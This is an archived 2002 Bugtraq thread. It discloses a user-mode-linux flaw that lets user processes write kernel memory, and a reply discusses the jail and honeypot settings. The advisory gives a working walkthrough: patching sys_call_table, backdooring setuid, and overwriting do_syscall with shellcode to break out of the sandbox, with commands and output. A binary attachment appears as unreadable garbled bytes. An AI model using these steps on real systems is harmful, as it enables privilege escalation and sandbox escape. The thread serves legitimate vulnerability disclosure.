7900272 2002-01-28 13:16 +1100 /185 rader/ Andrew Griffiths <andrewg@tasmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-28 21:18 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20711>
Ärende: user-mode-linux problems
------------------------------------------------------------
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Message-ID: <200201280216.g0S2GvH06047@franklin.nt.tas.gov.au>
Program: User-mode-linux Version tested: patch-2.4.17-8 [ I assume
all previous versions would be ] Not vulnerable: patch-2.4.17-9 [
Haven't tested any different techniques.]
Now for something completely different. Anything in []'s is my
comments to my article... deal with it.
Description:
------------
User-mode-linux is used to enchance kernel development by providing a
debuggable kernel, and also as a safebox for some applications.
[ Hereafter, uml refers to user-mode-linux. ]
Problem:
--------
A user proccess can write into kernel memory, which will allow a
person to get root inside the uml "box", and the possibility to break
out of the uml "box", into the real one.
This can happen even if the jail and honeypot options are turned
on. [ Though I suspect the version i was testing was half-way through
implementing them ]
Some effects can happen, such as causing the uml processes to die,
and making a process chew up heaps of cpu time indefinately.
Reproducing:
------------
I used the small debian 2.2 root fs to play around with, on a host
kernel of 2.4.17ctx-5 (vserver context security patch).
To start it up I used: [andrewg@blackhole linux]$ ./linux
ubd0=debcow,root_fs_debian2.2_small jail=1 honeypot=1 jail honeypot
[ I'm being doubly cautious, and looking at the jail setup code, I
don't think it would have been bothered by my putting it in their
twice. ]
Mitigation:
-----------
Well, to prevent some of the problems, I suggest running the uml in a
chroot()ed enviroment, with memory and cpu restrictions turned on.
Not allow people to run their own code. Well, thats rather tricky,
since if they can overflow anything (just a normal program) and
execute code of their own choosing, you have pretty much lost
already...
[ Free tip for those who use it for high security. Put all the
binaries on a seperate ubd device, and leave make it non-writable by
the uml process. That way you don't have the
replaced-replaced-binary problem, however, /bin would be hard to do. ]
Fix:
----
Upgrade.
Exploit:
--------
There is no exploit as such yet, just a tool to help you exploit
it. Attached is a program for you to play around with.
This program is somewhat simple, and definately not
finished. However, it does everything I needed it do, plus a couple
of other things.
For the commands you don't specify the offset for sys_call_table, it
uses the built in one at 0xa019f650. [ Which is nolonger valid for my
./linux, and most likely not for your system. ]
[andrewg@blackhole mpmt]$ ./mpmt -h
./mpmt: invalid option -- h [ Hey, I said it wasn't finished. ]
Multi-Purpose Modification Tool v0.6 by Andrew Griffiths
./mpmt -1 [ -2 ] [ -o ] [ -p | -f | -s ] [ -r ]
./mpmt -o 0xa020ee1f -p -1 61
Would print out the offset of chroot at the sys_call_table
location of 0xa020ee1f
./mpmt -1 23 -2 36
Would replace setuid()'s location in sys_call_table with
sync()s function.
./mpmt -1 23 -2 36 -r
Would replace setuid()'s location in sys_call_table with
sync()s function, and restore it back to it would in n
seconds. (time default is 30 seconds)
For values of these numbers, look in /usr/include/asm/unistd.h
Also, you can do abiratory read and writes on kernel memory,
with the -a for the address, -c for how much to copy, -R to
read, and -W to write and -F to specify file.
[andrewg@blackhole mpmt]$
To do things like play around with the sys_call_table, you'll need the
address of it. To get it, just do:
[andrewg@blackhole linux]$ nm -a linux | grep sys_call_table
a01bb744 D sys_call_table
00000000 a sys_call_table.c
[andrewg@blackhole linux]$
and the first address is the sys_call_table. I haven't looked into
determining the sys_call_table address while you're in it. I suspect
it could be done by looking at the kernel memory (which is an elf
file), and finding the address via the global offset table, or
something. If it isn't stripped, you should be laughing. Once you
can work these out, you should be able to write a version independant
exploit.
Since you've already seen some of the things it does, I'll explain
the bottom parts.
To get a copy of the first 256 bytes of the sys_call_table struct,
and to dump it into systable:
andrewg@usermode:~$ ./mpmt -a 0xa01bb744 -c 256 -R -F systable
To get the first 2048 bytes of setuid so you can backdoor it:
andrewg@usermode:~$ ./mpmt -o 0xa01bb744 -p -1 23
Location in memory where function 23 is 0xa0018024
andrewg@usermode:~$ ./mpmt -a 0xa0018024 -c 2048 -F setuid.dump -R
andrewg@usermode:~$ [ Now run ndisasm and patch and then run... ]
andrewg@usermode:~$ ./mpmt -a 0xa0018024 -c 2048 -F setuid.dump -W
The sharp reader will have already noticed that we could replace the
getuid with a harmless syscall such as sync, and then call su || su
-c "shell script" to do what we want. However, on my system, there's
a couple of problems, like it starting of way too many su proccess's
or them dying straight away. However the
-c one seems to work...
[ News just in... ]
And now for the ultimate exploit against User-mode-linux: Breaking
out of it. To break out of uml, you need to cause the tracer program
to execute code of your choosing. [ No shit!?! Thats because the
tracer pid isn't running being ptraced itself. Sidenote: If you
could kill the tracer, you might be able to execute cide... ] We can
accomplice this by writing into certain areas of memory... The
function I have choose to target is do_syscall.
Now, for the exploitation:
[andrewg@blackhole andrewg]$ nm -a /usr/src/linux/linux | grep do_syscall
a01000f0 T do_syscall
[andrewg@blackhole andrewg]$ cat /tmp/sh <<_EOF_
#!/bin/sh
echo OWNED > /tmp/umlisbroken
_EOF_
[andrewg@blackhole andrewg]$ chmod +x /tmp/sh
And now for the usermode linux part, where ex is just a program that
spits out standard Aleph1 (Phrack 49) shellcode.
andrewg@usermode:~$ ./ex | sed s/bin/tmp/ > exploit_code
andrewg@usermode:~$ ./mpmt -a 0xa01000f0 -c 43 -W -F exploit_code
At this point, the screen where you started UML, is probably a
message like: Kernel panic: Error mapping a page - errno = 9 [ Bad
File descriptor ]
I suspect its trying to mmap() a page from somewhere with a fd that
isn't valid for the real kernel. (Cause it's no longer being
ptrace()d.)
And now [Drum roll please]
[andrewg@blackhole andrewg]$ cat /tmp/umlisbroken
OWNED
[andrewg@blackhole andrewg]$
You may be asking why the shellcode doesn't do anything more interesting than
exec()ing /tmp/sh, well, you gotta remember this is for "proof of concept"...
Don't forget to do a "killall -9 linux" and restart it, cause you've
just killed it....
--
www.tasmail.com
(7900272) /Andrew Griffiths <andrewg@tasmail.com>/(Ombruten)
Bilaga (application/octet-stream) i text 7900273
7900273 2002-01-28 13:16 +1100 /31 rader/ Andrew Griffiths <andrewg@tasmail.com>
Bilagans filnamn: "mpmt.tgz"
Importerad: 2002-01-28 21:18 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20712>
Bilaga (text/plain) till text 7900272
Ärende: Bilaga (mpmt.tgz) till: user-mode-linux problems
------------------------------------------------------------
���9ÃS<��ì[
t�×u�Á¥µ�Â��\l�2?+UÒþjWHÈ�Ä
ã�K�°AY¯fg5�»;ëYÈ��Ë*5M89��7ÇMãÄmëã`W-¸àØÇ¥-9u\Ú:5>]ÙòÚr��Ô{ï{»3V
ìà¤�§÷Ýûî»ïÞû~ç�OÆ
§pm�Ëç
�ª!w¹�~ß?+àóø�^Ëå�\nwÀí�Äêkl�=iÝ�§DQ�'")ywǤrW*ÿ-}âØÿëûä¨�¯Q�.·Ëå�×ïÖþ÷øª-ýï�y¯·Ú-®kdÏçÿyÿ74õb$Ù�Vm�\¹5�I9�N�ªdoZ·�Øöf�ÄÑR%Ù7®¾�Å�`ÖVIõUZÝ^%Uiµö¢Å{��ºÅÅ{I]·X)WØí ²�P¯{Èâ½ØD7/�+5jÅ^´2��+£byfÿM�éwø¡ùϺõµq
ù�ð�ÜÙùï
ÀÄùïªöü~þ�³\´åEëÓ1CÜN%5]�×k�5ªJaCÕ�âfMÓn¿CMH±tD�WèF$¦¶W)wZxé
ì±<ÝH©ñ¼ªeuÈ4ÆòäT*1N,*%Ø8e]ºÓèJÊúD6ô+©´�ØÞ�²Î¼`¸%Øܲnã�±ÔUå/%©dJ34ÒF��Óz¸CvH
òD8.Õh40:´ïµ�E��#ê�§Á¡
±ô
�;èb{¸F¸6¥F£ª¡è;�¥�YÑ¡^¥[Ü.VzÄ6Ì4%Åp�
_:c¤Ä¶� Ru'¿.Mtí »<.YvGQ
(÷»õ&VÛalÕÒ±H|QK�¢¡È¢�ê2QQRRfaÆ>
I°1p{L�Æ#�²fãdíå|öxÑi¯jÆ¥äd,,Aó²V#²eºkWM³JÜ
ÁGÓô®ä(Ósý^5e« â¦a�",T K7´,ªØ�vp7µ�º�TS´DD¯���qalª.z]"/,»ZJì�ÇÒ0[ ¿ Ga<'Òñv9¥WåÚ.lÉÖSN>-a=îÌ®�\qQ>Í«bºV!viiQ
'Ä&ÛÕT��ê�ÇÂ�òpwJ5°å¸KN%ä�ã PĄ́�ãEî2,FÁrá�L2�¬
S
ò�m·�OK
KÒ]PÐ�x2h��wåV¬B&1º�i=)Kj´KÄuU6ò�Õp�·Û�j\µ®©µ9�Ün»�'L<¬&��©�©Bd+
àÎím´¤�ºÚ#�ÜD¨;eh¾¼|ÜÀ¨��c�Ëh*¹GýÕ®ºñJÊ1�õ�Z &-MVw½«C�B�
õ^�Ñ�Èa` rõ¥txè"éx²ë¡XaU>��Bwµw
Ò�9�CQ®wñ:�Ï(r)QâË{�è^��Ø#
��E5êÀÀwî2QÅ>I%¤xÛÝmÐ9áH§*É0ñ�eõõ®2��XÄ{°tXfÂ
UZÄ{uÏ�ú£h·�½æpHx:¦ÝÉÁz�[�õZ»ÖS�CÂÐkõRmcmóÖÒ²2q�� ݬ1�¤8$FIa�Ë´epD¢+u�øcÀdu0+Dì¡
Ñí'KÚ!R»êrJÝL)ï:ÐFµ#c*çè±Vô\EÅ(«È:�ê¹ó
%�� y%RL";DòÊèËjE
�
¼"�SC«ØÔ}�³Z8�²µ¦�pUÅÁ{�
6²Z8iXH:ÉkåoÎF�fÅd1ÞÊdØ(ÔÍÆ2Î�r³Y'îÅ�mÔÀvÑ,Ê
`�=[�pú°Ó
Í/W�Ù��ø�XºÍèRfØ4ÈMÁ&ËÖÆnq·"ÃÝÈÄ%�Ü$i÷ä¦UÛ�·s>³È²¸¶´64�[ZÊX�¬Ör;8í9§�
9)�G4�(Ü9äaÍAË:îÔÖFø`.cë3vt~¡}üB+XÍÓ
&4�rÜQêlW�Îö°®æÂ3�Õc²¤-»u6Ñäì¸�å�°ìÐYÄ�v5�hÐì�á,<F�ð0 ãZRN8p´W�C[7nhº÷¡¡æàªÍonnÝÐ�G�q
è�7B�¸H£�q^�)wªÀÙ�{°rÐ[BÙøÞ7·V³ch@K�d/ÛzÊ�ÕS6¶áÆ0,ý�sG;åT¡ÀLEÖ«m
h8¹Ù�Üäqæb<Ðy£Ú¼�£úiF�;ÿ*HG¶O�ñ!ì#ÓoúÅùwäÉÝÿ\Ã6ðþgòûÏ�ð»ÿ÷ø=¾ßßÿ|�Ï�M���9z0]@*yÀVèüå�Ý!Ì��ÂíÂBÈÔ�2��c�É�i:¤ó �Óoäe�<Ñ�e�æBý¹¬¾PÂÊ÷4Aª�F�¤¼|�dMó
ý©�Óa 1Íäm`*�ùÂm
D EK3¦¶;cÊHï©Òµ*�ãpÛÖnhå±`
í�é�
}�Ò
!ÍãnÜÌó�<¿û;�ÒuæC�é�«ïSxfp®ë]¡¥l:ÏçðÜÆmÅg.÷¥(Î'Pö�[á�îÇ�Ê�ý0ä¥v@Z�ôJ^>
�ö�]ËévHk®äôã6�íáô"H� Ýþ3H�Ðó9Ãi�Ðöé~�m²Ôß
éi ¿Çí96B�ÛÈ×
'!?
å^.v�ú�F�t�èWxù�Î�ýcNc�·´Wñ±þ-ÞÞÛ��¦ÿ/b<Áõ¯ä�ÚÉËq¤¬�ú�9Ý�iØbïß`ýdzôláK�/~ëx�ñW(Ô�×�!\PH¡*á�õ�lg�²Û&�J{¡¨�ÇÔ�e���:î
ìµBào5,�t¢�ø=�ÔÀy»C
j©P4�'j�î×�¡�ð,°w�½��ìþ�ªÓ¾�ÊÞQ
¸u�¡u�CxÁ�¥u9�Bh?w�ï7�<�ìà�¥ùÚ§^XÛ´nuCÈSå®òæ°Æø~¦[p�Í
ü]Âç�>úíj�Î
\#¯ª³Pó\Þ�wAÿͼ
»�Ŭ?gÀ$�µè:99(�Á�ÆñE̱Aî:´6Ìaâ�b��@1æ0yK0çb��z>æ0¹�b��Ã�³�sX<��ÃDwa�Æ9,05Ãd_9,F+1Åg
æ°�µö½Û;Ty�L>i�3/�¯��ÎÅ£Kà7ú;º�=S��¾=
Ï�ôPÁ²ÁÓD£§
jphôXÁ)=ø�Ñè¹Ãwð0Ñ��Åô!¢1�
vß`�Ñ��¥�é$Ñ���§ÄàýDc»ÞD4FJÙôJ¢1bÊ6¤]Dcäû�Æ�*èÐ`
Ñ�I%´@4FTÙôð%¤1²J�ùO4FXyü'�#�"ÿÆ+_'ÿÆÈ+É¢±�gÈ -S\pðù¾õ�Þ´¹Y�þc:»ßVxÏ�å}¶ÂL�Ô=ß÷!ô[˦�JoøxãÐß��bÿ1môtÛÅW÷}x?ýó^Î ÞÿOéuýóN�Ù?
o9h,��®¶}�9£7ð�ûþWÓï½K,ô��+§ù:ØÙ{¢ä��ß&CmÇ�vò1DÄóh�Ð/à~Í
�ó
SΣ³¤äø¯H
J�:xt)�_�èÞ!²òqì3ø5Z�-ó<«�E£i�¦Yð1�o�û²�0v�å¸1â[ÌVS¼Çä~vø?�K-Úÿ$Ç-1¹Mî
¦ìsÜs&w¥É}ÃäöÜ�²Üâ�~h$�ûm'#>\pød�TÂÉà0ËX¹²³?�U'o2æ�fÙë,;Ų�,�À¬·»¸ ³¾?XÜ;`�ì¼Ny
-re^dÖô
ì�Hßcä�àgN6gþë"Ùx��öæ?cÅt1Ä0ÓÆÄ�
¾óXð�À�ü"*ýrðÞ»/x´·ûhÃîSýGûm_=ü�¨ù66_²S�ÆÅ6ó
Þ~päý#}�B¨r%XÉO»õ�ý}ð¥âÆõ�ýkÛ0Á�L ±ò÷ò9ùV�BùÕ$�Âa?è�
bHØAø�á
_/È®'VýÂdödPÿ^böX}{ùÜ·óÇ/Q�úûå$öB}_æú¹ôê�\×ÙÁÝL�t0Ù©\B��ïÀ¹Ý}^½¿´�;ýM!½°·{X0föv�
iìP��Ðí!ÞÁݧ�ã¦Þî×�Ã,kȽ)�åàQpx×iø=2ê+�M�+�tcæÈ
Ü��2¯�qtÎ�~4:
ëÅ,Vòç�¸ßH|ÿ#ËÈÊ$¦e`Df�óî31;×h¿
¾ä)[ë�pz�
û
>=g¶R��æ
¡úì}/¡û�¼t&sñ-�.BåÁ'q¯¤Xíû1M�p®àt]�[èhúlæìG<êçz»Ï
]5�
¶¦eJ©ÄÖ7��I¸x�ÔPühÊ~«£Ï
kΩÑôùÑô¹Ì×F¨´.xÊ�0m¨ð�GL
?$\¸I¹�µ�¬Úîû(;.@S�ÓÄçø
Î{(#O�þù´�º~¬Cu¦C÷XÚ¯��çÐÑ�
ÿ2ÂûÔâÓÿæõéW¿0uþì�ܧ�T(Y�>2bñ©äJ^=ÞúÔ�ÚîZPÙÈè2n��[FKÚû6Ø#§CQúü¶ímÇóì?-ÍÙ½õ½y´.eþ�¢}UðLççÇÉ��Ì/÷|Ìïý¹ë«ø¬o·�~¸ôº¬èã²·�åÿ`Ïí0?_î®®èã~ü¶�Mø&?¡a�Ëî
íOíÓ;ÔÊw;7ü}e·_ñô|kGåà»:ÙvU�ÑíÂÍ�ÿÈ+X¿çÚ
|ßf'õêß¡ìBî[0áV}Ò8_þc]¸ì=9h}ú1[á�Hk~
N]W%:üÙ)êp¹}�yÛ�ê>
©Ë-Ü�É×o+,Îo?má+5Ç;Âl�Þ]nTwZît�¤�ô�¤o@ú.¤�ñÞ�ï
½�é�Þ[�úÊ!ÕBº�Ò}�~<láK2Þ
âk�Þùá;�^
8�¶�â}Þ¡^[!Þé½
4Ýé�°û=¬½OÄ=ç�ø»Îs�»ÏÃ{>¼g¬�½çB÷Gø�wh��ó´sûà4
9Ú2�ù÷÷¾³ë#BÇ�&/Oí��÷X+¸<Þùõp�±à/Xð³�ü®�ãI3u�>aÁ?·àÛ¦ø.�~Àû-ø;�|Ò1xY|�ßeÁ)�~�ð8þ¡�ãs$�þËH[
6¾½@pÙ̺�Üf»²N+~Ë¿
ùwmhçÉ
2/�_$ü�Â���.%\0�ñ�o&¼°0½�AÂnÂ;�{��½û
û�?MýWÆ1Âììó�Â5,>ÙG3�×�^J¸ð Âw�n&üYÂ
á¿@x�á¯�^MøYÂ
�^Cø-ÂAÂÃ�
�^x-áÛ ßE¸ð:Âë o
üWï!ü�áfÂï�n!<�ñf·�fß��ÞBø�ÂÛ�«·�î%üyÂO�fÿuñ��Ö.á�áw
?@ø�á�á�EÓ};Y»»�Ç�?H¸p7á§�÷�~p/ëGÂû�ÿ7á�ñ�Ñ#<Fx±Ï×(�¶qÜ�WÝ2��s¬>oá_²c²öz__l±{
³�è;Åf_ÿ{±Ù§�;88�ñ},n³ÌØffú_ú�Ï#̾vºg±j&ü0á·�?Bx>ú&üÑ�¿¬8;gç.¿ZPS0^~{¹&$8n¿ÝÔ3^¾§$?ÿYÒÿ¹ËÚæ2·�Öçña©ó5«ÿcg±3����°ÈôXdÆÇ$Ë?;Çì�Ý`âÿ¹Á�oD|7áÏÝhúõÐæ\û�á{
¿G¸ð�s�ßÏl&�&ü¹f[+çxð&�ÿÇÍ&Þ2�ñ÷&øbÅ�Î7×À����ÏX`®·.0×À�áÚ
zîYß{JsüÀö_AM¨ø¿�t¤×S³]w®n]×´ÆÙR*=Uðãô´Sè$OHÒâI<AVAE£Öp¸*Üeõ)Êê*=n_ÀWãõûjêr0P'à_S¨zÊê\un�Ð�
f�yY©wrE¹¿ZÌVñ±*>Ph}ò�r�ofBåjV¹z*Ç�ê/«_©û}u)Âuøç�y:W
ßcU8Á¤Es`]îI�ê2r:jPÛO:j
^OÀ_S¿s¢�Ú]n©³�{Ç_]í�q&ë@·��kH�p]¥ÛSÃz2§Òu[dݨÔS
*£1-Ì�'7r|P*D´4¼ì²"o®¨�(ZÖr_®ÜíA��1yOÎ!7t®^�¯8±Z�«qå©Sãá�N{=È0+ZÌòsÝ~ÞxVÄÚ~Ë@'AØ,B�,áÐ��r3�jO«1CM:á�¼739èr��a
UU¹wlzW¼]éUÊ�&+ªTªÞ�?û�'¼áGÕ�¨��õ.="'ugG"í�
å+ù=Ht:YõvÕÈýÓÕ¨¨�6Ò©ñ\üW�)"G9;®êÒ��Ù��ËI%ædhJ(aÛë©Zî7õ��¨
�uõA9ÁªÁ%f=Ä2�â�Îǹ0ÔM#ø�â/gl6@|¸Ø*°Óë#n5ã>�GBLºø�ä[¸~âú�jk87ÀÌp��¿Æb�°Ý~Î_Nü¬xïvv�ßëÉò¹Ù
fÇô
ø~_ï5íL)ðYÜÂK,�ÝõÑD('7éÛ}g¶4@¥,Hj6�8Î)¬ø��&w¹ÉU��çÒ�÷1CãZDβݦp�F®,ßcòµh4Ëe^�7faûHlNæìðT1Ós�
ø~ÿí�[�Yµº'c�l&qÖ5&»ôçÄ4ÝUý�Yv2Ó�ì
3�e�)«{ª§{ÓÝÕ[UÉ°"~�»"d÷CÁ�EØànð�Â"äSQ4��Eò�1èÏ"«,¬
¬sÏ}Öô�üYö£oÈT{ιsÏ=çÞª{OØï
DvY5�³¥Äìê»*\ëd'Ù�õÒÉ£%ra²)��:ã
ø8ö|¬ÿAW¹$l�¸�4
»Ú`9�Õ
¶Oè¸]A<¾ÿ�è²�ß¿��¨Ò£(«*¶h¿Õ�cTÈ©üv?hËü|"_§`«vc»D»�Ê¿î�\½Q[�ÚBQM�h6¸
ª�0ía,�å$B�p¡¢Ô§�\U¥��%ù9¥�¨Óë+¾b^ç#â³5
��*ßQù Ü*ÔÛf¥ÅnÔöú\±¨º�à �¸²l`�F±Dµ�ãÓ÷�#Õ�Ì83Ìq�ß�FÒQ(���4?ñX�µ»°ìbøË�y¡7¨5�òlA��d~Ø�Â^| »q�¼6·ãExï:pV�ùLÃã¨ÆDA�7ê
�éýe9»~ÔF/ReÞ¢îásð�ißL"(>�·ã�Ú�ïÅ
Î5��N
Íeìµ»Ø�_o9ïÕ(è÷Ú�F[�¤�³0½a×��0�ÎT-
¦`$jµ�eî½p�'BùJ0ä¢rhÔuf#"?�\U;¬Ñr�ìnAÃhåÙÅ�Ï�@ÌÄWbâ�=�8´��Wf8P«(o9pi@ªÒ´aÞ¾×¥Ñ^�ÀQVY���fw<�$ôDð
CR�Þ³ �8�ÇþM¥ÑG�ÙPäÀ
õ�Þrç�@KÆÃ81�7Ø�ú¡Ñv̽Þ�&Çm w��Yv£IZ?£®Ò¢�[
hÐDgaÛ�Ê¿
l¸ÏÍ31eÔW�pÂh@&²øaÄ+�]��ûº
º*zÅ��(õR°%ñB=�¯õJ*&d"XäÉAà©z,ûÄú\!a/&ðº@Isp!��±IyºJ
�e
ÂK´åªL�´¼0ìù¢F4Ëf�¿ãM�8dþ+ãªUH�0#TE©sBä(í¥d;´ÞÛ¤N6W'³
eâ�Ò}ìãråæóÒ¹ï÷¸»L[s�b�ϸÈ+ì·£�l[´£ü�n�ÈY�bPý�³©TÃ���Q|�Ù§Ì�ÒàÇÐY(ªF�$Ób��µ2E³ÄVM\�Êc¬¹Q@Ë!ªªG�ù5Z.*�Sõ¤A´~£"¸Og-[`µÃ�\��^h
Q�(�+D�î�XÅ�|�?eF�ýi��é»îÚÊÖæ�Ý/Ôr�ØÜÂG-¯e¬^®Ù�¸Qߨ9�®o\m¾ä®o^½Ö¬�dîk»u¹E»ÞhÔ×�º¤ò7W¶6®6êÍ:G�±¬ÖwV¶×¯6·¶k�¯YßÞ�l}{��ÕÅ%Ñ=[ëÞúÛXÞij]Z_ÛÜÚ®�×�ô
ÏL>n§Í¨Ìä��º|x¬è��Qâ+2E^"ò2'¯�"÷ÁáIê*Q£bäè:|/�âÐ�F
9!|:§p¨�bà
´¶±�>Kµ|�ë+c?<Ð�+±Ê�Ñ4Nd4
ÁÌ�>mÁç�ÁgH
Y
|��[é(±¿÷ø@¹íTòââ�Óí°T¸P¤6ÛÂ",«¯~�BQDX�m-kVV46ý�o&0*ÂLºý^ËízÃݾÏJp�à�Öµ��·ÝzÙ6É%F°·æÑ�8Ù�fëü0á&:a0pmýd/âÀÈ.YHÁÑÜ°�aÒvåu±éëÃAo�bò±�Ø�á¥bãÝ®T�qÇt¶¹C¼
Y´5ëÚ�W|NeÂ0�ò¥Ã�¥)�nÃÙ=�ÇqQ
qç�!¬K�"�Ñé{{ÉõQox�óH��æ
½>n½«wÖ«�ÕCÓÃI.â;À±aN)¶ÐSµBW&¬�ð�ÈY�Q��_ÑË¢Y�R
ó�Ú,»JrElÅpòK\(V°°Ü
�ä�À
öÛD�{Åæ q��ÀM·¹ Kjk��Z½!.S�´½Ñd*ÕDj�h�8ï�ê�y^õÍáoä*�y>æð7ry?Ö�´Wrkú»7GÛV7RjkTµ¶²RË,¬m^»Á×�]Jtò
m7ó¢�g�¸èɳyFp©\ýè¸*Å;�öK+Áï¹|6� ><+���b¯�Ï8¤gWüb�ydeAìg/¯_½=+ÛÅ3[ÙÝ!0Ò3�ìÞp½�)¼¼¤�.àB¿Ý�búÑ"ú1êÇXE�þ²èÖ¬l�r�� ®Céì¯ß¥+MV¶��!°ïÒ
ð�½6´ÌþD¼C^µ
f×�6�Ô�ëÿHç¹°ðì�»iÑù ÄÇhü
|Ó±{)~ÿ§cü�åtxi�è~©áñÿø�ô Ng��Ý�ñ¦,u¿�OzÌp:<�õ&�ÏjàÄOü*ç�Ï0ý�
(iõ»øeøCNg��AÎ2ëÅÑíNp�<;5?KÊ
øyþD¸¯Ñ]�º�³ÔnÄ?Ñ5:<µ8Kgµ�R£û:o�ùÂ3a�féÌVRÎßÔèÞ�º÷n2éðÿ·4:¼£;Âs)Ç�¸ãöFgÐÞ{Òâ§�Ìz¿k)}ɼqìÓõÃYEáÏïs:�;v/w^Õ¥÷FwîÍ+N÷c�Ïpß7ï·
ºkt�îÁ�tïhtxvî�Ðu�tøÿ. Ò±ûÃOÑÝáY�Ëÿ¥î*ã�w²$æ�~F£Ëht¢}÷-ó®'ÒÝ>®î��½ù³¥îöbzó�×KÖû×Dy�ÀäX0ð¦�ÖRŲnNèÇD½?�ºM �º"Ò7ùö ÒÏ[jHwgÕ²¾e<î�4Ú-ñ��Ú'©æ� S�%LÒF»B0ª8�9C7È $ö`Ò¬��¦�Ô�¦c¾�$ü�µWÂ'�<zMÀ§�óà'�óàÓ�¾{[À4£îInwßðYª_ÂdÙ�IxÁâ¼ë�?Qú®?ÅÍuJ3eBø\�þl�>/$àg�ð³Æ¸�³þù_Øw^�gTO±���ø¹�½=ÿ®Æ'�}[Çc'��HøSÖ�<§á¿¬ñc}xÒîÄav9óºÂ£]Å�aø§-¼�Óð·áùU
~Û(oÎú¥Æ3�ã9©?wn©þüV±¼¿ÀóO�?Ö÷ðÖÑõýÃRg£±ÿÿIôoÒx¼§Õ"u�?z]áçRJßξKñ�Kñ�0�_à+)*ï"»_Êj'â
Ä)/dWN[¯¦Ìø�·Rfü�¤Ìø�?Mñ�~2ã�à:EÌç³0ÿ2ã�ü;eÆ#86ã�\J«ù>�í/¤Íø�WÒf|/¥Íø�/§Õ|<�ò½�0Þ�Æõ ÊãÕ´�¿à{ie/2Pã[i3Á/Òjüνy'mÆ7øcÚoð÷´�ßàD{>L+ûr�ìË<Èíä�þÜ��aqÆðü��áê��ÁQýý�3>Â×4Á?¸üÆ�w¶<�Ç.è¨à â$];£xÜéÀÏQ6�[áÕæÖ¶ÛXßiº.?&��{�¿ã�î^?hy}-×]o|�rë/ºW¶7êîåúÚú&0aõôuË¢DYÛ¢��É^ØÐÏN�âÇm¡¬�n½¾¶V�£©o®2U� f�Äc6»«/m.o¬¯ð
/¼ %L�¯ �°?z��ßF��:#·»/�Gè���¡Ã"8
Ù�3PAÏV�Ôl{E�"ÌR&F«0+ÇÀ���)��®0H1JF¢á�ï¬�6f¼��ºâP0��Ç���˶fÀ�
Ç��xHçÀ`�F >)ÐZcëòrÃݺre§ÞtË�uP�¸+b}$:���).Qp2`Ö�üàdJÄ�M2MÓ4MÓ4MÓ4MÓ4MÓ4MÓ4MÓ4MÓ4MÓ4MÓ4M�ãô?xÕ)(�x��
(7900273) /Andrew Griffiths <andrewg@tasmail.com>/(Ombruten)
7921665 2002-01-31 09:13 -0600 /46 rader/ Ajax <ajax@firest0rm.org>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-31 21:37 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: Andrew Griffiths <andrewg@tasmail.com>
Mottagare: Bugtraq (import) <20758>
Kommentar till text 7900272 av Andrew Griffiths <andrewg@tasmail.com>
Ärende: Re: user-mode-linux problems
------------------------------------------------------------
From: Ajax <ajax@firest0rm.org>
To: <bugtraq@securityfocus.com>
Cc: Andrew Griffiths <andrewg@tasmail.com>
Message-ID: <Pine.BSO.4.33.0201310847170.6711-100000@belial.firest0rm.org>
On Mon, 28 Jan 2002, Andrew Griffiths wrote:
> Program: User-mode-linux
> Version tested: patch-2.4.17-8 [ I assume all previous versions would be ]
> Not vulnerable: patch-2.4.17-9 [ Haven't tested any different techniques.]
>
> Now for something completely different. Anything in []'s is my comments to
> my article... deal with it.
> <snip>
>
> A user proccess can write into kernel memory, which will allow a person
> to get root inside the uml "box", and the possibility to break out of
> the uml "box", into the real one.
>
> This can happen even if the jail and honeypot options are turned on. [
> Though I suspect the version i was testing was half-way through
> implementing them ]
you're right about the "half-way through" bit. 2.4.17-9um is much
better in this respect.
the honeypot option explicitly *reduces* security:
/usr/src/uml/linux$ ./linux --help | grep -A 3 honeypot
honeypot
This makes UML put process stacks in the same location as they are
on the host, allowing expoits such as stack smashes to work against
UML.
/usr/src/uml/linux$ ./linux --version
2.4.16-2um
as of 2.4.17-9um, the "honeypot" option turns on the "jail" option;
thus the most secure setup is to run uml with "jail" and not
"honeypot".
also, running uml itself within a chroot, as its own UID, and with no
capabilities, quite effectively limits the damage an attacker can do
in breaking the uml container. but you all knew that already.
-=:[ ajax (firest0rm)
(7921665) /Ajax <ajax@firest0rm.org>/-----(Ombruten)